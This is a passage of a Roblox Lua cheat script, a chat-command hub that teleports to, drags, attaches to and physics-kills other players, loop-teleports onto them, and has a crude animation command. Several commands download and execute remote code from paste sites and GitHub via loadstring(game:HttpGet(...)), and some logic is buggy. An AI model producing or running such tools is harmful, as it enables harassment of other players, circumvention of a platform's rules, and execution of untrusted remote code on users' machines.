        notif("-> ctrl, shift, alt, fn")
        notif("-> f1, f2, f3, etc")
        notif("-> a, b, c, etc")
        notif("example usage: >tpclick ctrl+shift+a")
    elseif tpclicksuccess then
        notif("successfully binded ".. key)
        wait(1)
        tpclicksuccess = false
    end
end

wait()

commands.jerk = function()
    if dontuse then return end
    dontuse = true
    task.wait(.2)
    local character = game.Players.LocalPlayer.Character
    local isR6 = character:FindFirstChild("Torso") ~= nil
    if isR6 then
        notif("R6 Detected.")
        loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))()
    else
        notif("R15 Detected.")
        loadstring(game:HttpGet("https://pastefy.app/YZoglOyJ/raw"))()
    end
    task.wait(.2)
    dontuse = false
end

wait()

commands.tsbbring = function(target)
    if game.PlaceId ~= 10449761463 then
        error("this command only works on The Strongest Battlegrounds.")
        return
    end
    if not target then
        error("user not found")
        return
    end
    local targetname = getfullname(target)
    local live = game.Workspace.Live:FindFirstChild(targetname)
    local user = game.Players.LocalPlayer
    local a = user.Character.HumanoidRootPart
    local bkp = user.Backpack
    local firstcd = user.PlayerGui.Hotbar.Backpack.Hotbar["1"].Base:FindFirstChild("Cooldown")
    local secondcd = user.PlayerGui.Hotbar.Backpack.Hotbar["2"].Base:FindFirstChild("Cooldown")
    local thirdcd = user.PlayerGui.Hotbar.Backpack.Hotbar["3"].Base:FindFirstChild("Cooldown")
    local fourthcd = user.PlayerGui.Hotbar.Backpack.Hotbar["4"].Base:FindFirstChild("Cooldown")
    local currentpos = a.CFrame
    local special = false
    local actualpos = CFrame.new(currentpos.Position)  -- Extract position and use it for CFrame.new
    local normmax = game.Players.LocalPlayer.CameraMaxZoomDistance
    local normmin = game.Players.LocalPlayer.CameraMinZoomDistance
    if dontuse then
        error("ew")
        return
    else
        dontuse = true
    end

    task.wait(.2)

    if bkp:FindFirstChild("Flowing Water") or bkp:FindFirstChild("Lethal Whirlwind Stream") then
        if not firstcd or not secondcd then
            if bkp:FindFirstChild("Flowing Water") and not firstcd then
                spawn(function()
                    undertp(target)
                end)
                task.wait(.2)
                if live:FindFirstChild("M1ing") then
                    notif("Waiting for target to stop m1ing...")
                    repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
                end
                usetsbmove("Flowing Water") 
            elseif bkp:FindFirstChild("Lethal Whirlwind Stream") and not secondcd then
                spawn(function()
                    looptp(target)
                end)
                task.wait(.2)
                if live:FindFirstChild("M1ing") then
                    notif("Waiting for target to stop m1ing...")
                    repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
                end
                usetsbmove("Lethal Whirlwind Stream")
            end
        else
            error("All your compatible moves are on cooldown, try again later")
            looping = false
            dontuse = false
            return
        end
    end

    if bkp:FindFirstChild("Bullet Barrage") or bkp:FindFirstChild("Head First") then
        if not fourthcd or not firstcd then
            if bkp:FindFirstChild("Head First") and not fourthcd then
                spawn(function()
                    looptp(target)
                end)
                if live:FindFirstChild("M1ing") then
                    notif("Waiting for target to stop m1ing...")
                    repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
                end
                usetsbmove("Head First")
            elseif bkp:FindFirstChild("Bullet Barrage") and not firstcd then
                spawn(function()
                    loopbehind(target)
                end)
                task.wait(.2)
                if live:FindFirstChild("M1ing") then
                    notif("Waiting for target to stop m1ing...")
                    repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
                end
                usetsbmove("Bullet Barrage")
                task.wait(.2)
            end
        else
            error("All your compatible moves are on cooldown, try again later")
            dontuse = false
            return
        end
    end

    if bkp:FindFirstChild("Beatdown") or bkp:FindFirstChild("Homerun") or bkp:FindFirstChild("Foul Ball") then
        if not secondcd or not firstcd or not fourthcd then
            if bkp:FindFirstChild("Beatdown") and not secondcd then
                spawn(function()
                    loopbehind(target)
                end)
                task.wait(.2)
                if live:FindFirstChild("M1ing") then
                    notif("Waiting for target to stop m1ing...")
                    repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
                end
                usetsbmove("Beatdown")
            elseif bkp:FindFirstChild("Homerun") and not firstcd then
                spawn(function()
                    loopbehind(target)
                end)
                task.wait(.2)
                if live:FindFirstChild("M1ing") then
                    notif("Waiting for target to stop m1ing...")
                    repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
                end
                spawn(function()
                    usetsbmove("Homerun")
                end)
                wait(.5)
            elseif bkp:FindFirstChild("Foul Ball") and not fourthcd then
                spawn(function()
                    loopbehind(target)
                end)
                task.wait(.2)
                if live:FindFirstChild("M1ing") then
                    notif("Waiting for target to stop m1ing...")
                    repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
                end
                usetsbmove("Foul Ball")
            end
        else
            error("All your compatible moves are on cooldown, try again later")
            dontuse = false
            return
        end
    end

    if bkp:FindFirstChild("Atmos Cleave") then
        if not secondcd then   
            if bkp:FindFirstChild("Atmos Cleave") and not secondcd then
                spawn(function()
                    undertp(target)
                end)
                task.wait(.2)
                if live:FindFirstChild("M1ing") then
                    notif("Waiting for target to stop m1ing...")
                    repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
                end
                usetsbmove("Atmos Cleave")
            end
        end
    end

    if bkp:FindFirstChild("Crushing Pull") or bkp:FindFirstChild("Windstorm Fury") then
        if bkp:FindFirstChild("Crushing Pull") and not firstcd then
            spawn(function()
                undertp(target)
            end)
            task.wait(.2)
            if live:FindFirstChild("M1ing") then
                notif("Waiting for target to stop m1ing...")
                repeat wait() until not live:FindFirstChild("Freeze") and not live:FindFirstChild("M1ing")
            end
            user.CameraMaxZoomDistance = 0.5
            lookAt(target)
            wait()
            spawn(function()
                usetsbmove("Crushing Pull")
            end)
            spawn(function()
                task.wait(1)
                user.CameraMaxZoomDistance = 21
                user.CameraMinZoomDistance = 20
                wait(.1)
                user.CameraMaxZoomDistance = normmax
                user.CameraMinZoomDistance = normmin
            end)
        end
    end
    task.wait(.3)
    looping = false
    a.CFrame = currentpos
    dontuse = false
end

wait()

commands.lbbg = function()
    loadstring(game:HttpGet("https://pastebin.com/raw/FidNdxXV"))()
end

wait()

commands.looptp = function(target)
    looptp(target)
end

wait()

commands.unlooptp = function(target)
    looping = false
end

wait()

commands.bring = function(target)
    if target then
        bring(target) 
    else
        error("user not found")
    end
end

wait()

commands.attach = function(target)
    if target then
        attach(target)
    else
        notif("Usage: " .. prefix .. "attach [player]")
    end
end

wait()

commands.meow = function(args)

    -- Now plr and nick are properly separated
    notif("Target Player: ".. plr)

    if nick then
        notif("Nickname: ".. nick)
    else
        notif("No nickname provided")
    end

    -- Continue your connection logic here...
end


commands.teaminvite1 = function(args)
    if dontuse then return end
    dontuse = true
    task.wait(.2)

    local firstSpace = string.find(args, " ")
    local plr, nick

    if firstSpace then
        plr = string.sub(args, 1, firstSpace - 1) 
        nick = string.sub(args, firstSpace + 1) 
    else
        plr = args
        nick = nil
    end


    local returntimer = false
    local target = getfullname(plr)
    local timer = 0
    local speakername = game.Players.LocalPlayer.Name
    connectionwithplr = false
    respondedmessage = false
    requestyes = false
    requestno = false

    if not game.Players:FindFirstChild(target) then
        error("invalid target")
        dontuse = false
        return
    end

    notif("Connecting to ".. target)

    for i = 1,20 do
        sc("..checkforusingthis218 ".. target)
        task.wait()
    end

    spawn(function()
        for i = 1,5 do
            wait(1)
            timer = timer + 1
        end
    end)

    repeat wait() until respondedmessage == true or timer == 5

    if not respondedmessage then 
        error("Target is not using this script.")
        dontuse = false
        return
    end

    if nick then
        sc("..".. target .."1215 ".. nick)
    else
        sc("..".. target .."1214")
    end
    wait(.1)
    sc("..getrequestername2834 ".. speakername)
    task.wait(.1)
    sc("..askforconnect8172 ".. target)
    wait()

    notif("Waiting for response...")

    spawn(function()
        wait(30)
        returntimer = true
    end)

    repeat wait() until requestyes or requestno or returntimer

    if requestyes then
        notif(target .." accepted the request")
        connectionwithplr = true
    elseif requestno then
        notif(target .. " declined the request")
        connectionwithplr = true
    elseif returntimer then
        error("Failed to fetch target's response")
        connectionwithplr = true
        task.wait(.5)
        notif("Closing request...")
    end

    task.wait(.2)
    dontuse = false
end


commands.silentchat = function(e)
    if not e or e == "" then return end
    notif("Chatted silently: " .. e)
    game.Players:Chat(e)
end

wait()

commands.breakvelocity = function()
    breakvelocity()
    notif("broke velocity")
end

wait()

commands.tpto = function(target)
    tpto(target)
end

wait()

commands.kill = function(plr)
    if dontuse then
        return
    end
    dontuse = true
    task.wait(.1)
	local speaker = game.Players.LocalPlayer
	local target = findPlayer(plr)

	if not target or not target.Character then
		notif("Could not find target's character.")
		return
	end

	if tools(speaker) then
		local currentpos = getRoot(speaker.Character).CFrame
		local hrp = getRoot(speaker.Character)
        task.wait()
		attach(plr)

		repeat
			task.wait()
			if hrp then
				hrp.CFrame = CFrame.new(999999, workspace.FallenPartsDestroyHeight + 5, 999999)
			end
		until not getRoot(target.Character) or not getRoot(speaker.Character)
        notif("Killed target")
        speaker.CharacterAdded:Wait():WaitForChild("HumanoidRootPart").CFrame = currentpos

	else
		notif("You need to have an item in your inventory to use this command")
	end
    task.wait()
    dontuse = false
end

wait()


commands.airwalk = function()
    local speaker = game.Players.LocalPlayer
    airwalk(speaker)
end

wait()

commands.unairwalk = function()
    local speaker = game.Players.LocalPlayer
    unairwalk(speaker)
end

wait()

commands.toloc = function(loc)
    if loc == "bigplatform" or loc == "bpf" then
        gotocframe(CFrame.new(1028.55798, 481.220215, 23000.375, 0.997213364, 7.31949257e-08, 0.0746019781, -7.33295806e-08, 1, -9.34153754e-10, -0.0746019781, -4.53898119e-09, 0.997213364))
    elseif loc == "tsbedge" then
        gotocframe(CFrame.new(-193.688171, 539.585571, -426.296234, 0.38698405, -4.57593679e-08, -0.922086418, 6.23400931e-09, 1, -4.70095927e-08, 0.922086418, 1.24436665e-08, 0.38698405))
    elseif loc == "tsbmountain" then
        gotocframe(CFrame.new(90.5111389, 652.838135, -356.541962, -0.675031662, -9.12752469e-08, -0.737788737, -3.0716933e-08, 1, -9.56104884e-08, 0.737788737, -4.18775024e-08, -0.675031662))
    elseif loc == "dark" then
        gotocframe(CFrame.new(-2.42143869e-08, 8.9999999e+11, -1.11758709e-08, 1, -6.99137601e-08, -3.7177882e-14, 6.99137601e-08, 1, 3.21123927e-08, 3.49327839e-14, -3.21123927e-08, 1))
    elseif loc == "pixel" then
        gotocframe(CFrame.new(30000000, 29999920, 30000000, 1, 1.35856171e-08, -4.3734493e-14, -1.35856171e-08, 1, -6.24038021e-09, 4.36497152e-14, 6.24038021e-09, 1))

    end
end
wait()

commands.scl = function()
    if dontuse then return end
    dontuse = true
    task.wait(.5)
    local root = game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
    if root then
        local pos = root.Position
        local cframevar = string.format("%.0f, %.0f, %.0f", pos.X, pos.Y, pos.Z)
        notif(cframevar)
        setclipboard(cframevar)
    end
    task.wait(.5)
    dontuse = false
end

wait()

commands.simplecopyloc = function()
    if dontuse then return end
    dontuse = true
    task.wait(.5)
    local root = game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
    if root then
        local pos = root.Position
        local cframevar = string.format("%.0f, %.0f, %.0f", pos.X, pos.Y, pos.Z)
        notif(cframevar)
        setclipboard(cframevar)
    end
    task.wait(.5)
    dontuse = false
end

wait()


commands.copyloc = function()
    local a = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
    setclipboard(tostring(a))
end

commands.moveset = function(move)
    if game.PlaceId ~= 10449761463 then
        error("this command only works on The Strongest Battlegrounds.")
        return
    end
    if dontuse then return end
    dontuse = true
    task.wait(.1)
    if moveset == "trashcanman" or "trashcan" or "tcm" then
        loadstring(game:HttpGet("https://raw.githubusercontent.com/yes1nt/yes/refs/heads/main/Trashcan%20Man",true))()
    elseif moveset == "gojo" then
        getgenv().FatalCombatSkillLayout = true
        loadstring(game:HttpGet("https://gist.githubusercontent.com/SonicexePort/d83f3eca5e8092468df1551df09db39a/raw/861f16fbae8fab8803cabfbc01295bb5b687f86a/Death%20Port%20Six%20Eyes%20Public%20Beta"))()
    elseif moveset == "mahito" then
        getgenv().Swordm1= true -- set trueif you want have sword thing on mahito m1
        getgenv().night = false  -- set true if you want night 
        getgenv().plushie = false ---set true if you want plushie mahito 
        getgenv().blackflash = true ---set true if you want v1 truly black flash
        getgenv().chat = false ---set true if you visual to other pov that your mahito
        loadstring(game:HttpGet('https://raw.githubusercontent.com/Kenjihin69/Kenjihin69/refs/heads/main/Mahito%20v2%20sigma%20tp%20exploit'))()
    elseif moveset == "johndoe" or moveset == "john" or moveset == "jd" then
        loadstring(game:HttpGet("https://raw.githubusercontent.com/Luckyfromyoutube/JohnDoe/refs/heads/main/TSBMODEL"))()
    else
        warn("invalid moveset, use >cmdlist for the list of movesets")
    end
    task.wait(.1)
    dontuse = true
end

wait()

commands.undertp = function(plr)
    undertp(plr)
end

wait()

commands.cmdlist = function()
    if dontuse then
        return
    end
    dontuse = true
    task.wait(.1)
    notif("Check F9 for the list of commands")
    print("")
    print("")
    print("----------------------------------CMD LIST---------------------------------------------")
    print("KILL: Kills the selected target [TOOL REQUIRED]")
    print("BRING : Brings the selected target to you [TOOL REQUIRED]")
    print("ATTACH: Attaches the selected target to you [TOOL REQUIRED]")
    print("TPTO: Teleports you to the selected target")
    print("TPCLICK: Sets up a teleport-click script with customizable keybinds")
    print("LBBG: Lucky block battlegrounds script [LBBG ONLY]")
    print("TSBBRING: Brings the selected target to you [TSB ONLY]")
    print("BREAKVELOCITY: Breaks your velocity")
    print("LOOPTP: Loop teleports to the selected target")
    print("UNLOOPTP: Stops loop teleporting")
    print("REJOIN/RJ: Rejoins the server")
    print("AIRWALK: Allows you to walk on air")
    print("UNAIRWALK: Disables airwalk")
    print("KILL: Kills selected target [TOOL REQUIRED]")
    print("RESET: Resets the speaker's Character")
    print("TPWALK: Teleport walks you with the set speed (NUMBER REQUIRED)")
    print("UNTPWALK: Disables tpwalk")
    print("MOVESET: (MOVESET REQUIRED )Movesets: trashcanman/trashcan/tcm | johndoe,jd,john | gojo | mahito [ TSB ONLY ]")
    print("COPYLOC: Copies your current CFrame")
    print("TOLOC: Teleports you to set locations (LOCATION) [LIST OF SET TELEPORTATIONS DOWN BELOW]")
    print("SILENTCHAT: Silently Chats a message (MSG)")
    print("JERK: uhhhh")
    print("UNDERTP: Teleports under the target [ >unlooptp to stop ]")
    print("SIMPLECOPYLOC / SCL: Copies the cframe with a simple format, no e+ and only front three coords")
    print("AUTOLOCK: Auto locks onto the player your cursor is pointing to")
    print("LOCKON: Locks your camera on the selected target")
    print("UNLOCKON: Disables lockon")
    print("----------------------------------TP LIST---------------------------------------------")
    print("tsbedge [TSB ONLY]")
    print("bigplatform / bpf [TSB ONLY]")
    print("tsbmountain [TSB ONLY]")
    print("dark")
    print("pixel")
    wait(.5)
    dontuse = false
end

wait()


addFrame("  bring (plr) [TOOL]  ") wait(randNum) rollrand()

task.wait()

addFrame(" attach (plr) [TOOL] ") wait(randNum) rollrand()

task.wait()

addFrame("         tpto (plr)         ")  wait(randNum) rollrand()

task.wait()

addFrame("  tpclick (KEYBIND)  ") wait (randNum) rollrand()

task.wait()

addFrame("            lbbg           ") wait(randNum) rollrand()

task.wait()

addFrame("  tsbbring [BUGGY] ") wait(randNum) rollrand()

task.wait()

addFrame("    breakvelocity    ") wait(randNum) rollrand()

task.wait()

addFrame("      looptp (plr)      ") wait(randNum) rollrand()

task.wait()

addFrame("     unlooptp (plr)     ") wait(randNum) rollrand()

task.wait()

addFrame("         rejoin/rj          ") wait(randNum) rollrand()
 
task.wait()

addFrame("          airwalk          ") wait(randNum) rollrand()
  
task.wait()

addFrame("        unairwalk        ") wait(randNum) rollrand()
  
task.wait()

addFrame("          kill (plr)          ") wait(randNum) rollrand()

task.wait()

addFrame("          reset            ") wait(randNum) rollrand()

task.wait()

addFrame("     tpwalk (num)      ") wait(randNum) rollrand()

task.wait()

addFrame("        untpwalk        ") wait(randNum) rollrand()

task.wait()

addFrame("  moveset (move)  ") wait(randNum) rollrand()

task.wait()

addFrame("        copyloc          ") wait(randNum) rollrand()

task.wait()

addFrame("       toloc (loc)        ") wait(randNum) rollrand()

task.wait()

addFrame("             jerk             ") wait(randNum) rollrand()

task.wait()

addFrame("  silentchat (msg)  ") wait(randNum) rollrand()

task.wait()

addFrame("     undertp (plr)     ") wait(randNum) rollrand()

task.wait()

addFrame(" simplecopyloc/scl ") wait(randNum) rollrand()

task.wait()

addFrame("        autolock        ") wait(randNum) rollrand()

task.wait()

addFrame("      lockon (plr)      ") wait(randNum) rollrand()

task.wait()

addFrame("        unlockon        ") wait(randNum) rollrand()


game.Players.LocalPlayer.Chatted:Connect(function(msg)
    if string.sub(msg, 1, 1) == prefix then
        local args = string.split(string.sub(msg, 2), " ")
        local command = args[1]
        table.remove(args, 1)

        if commands[command] then
            commands[command](table.concat(args, " "))
        else
            notif("invalid command")
        end
    end
end)

for i, v in pairs(game:GetService("Players"):GetPlayers()) do
	ConnectP1(v)
    ConnectP3(v)
    ConnectP4(v)
    ConnectP5(v)
    ConnectP6(v)
end

game:GetService("Players").PlayerAdded:Connect(function(plr)
	ConnectP1(plr)
    ConnectP3(plr)
    ConnectP4(plr)
    ConnectP5(plr)
    ConnectP6(plr)
end)


wait()
notif("cmdhub loaded")
notif("type ".. prefix .."cmdlist to see the list of commands")
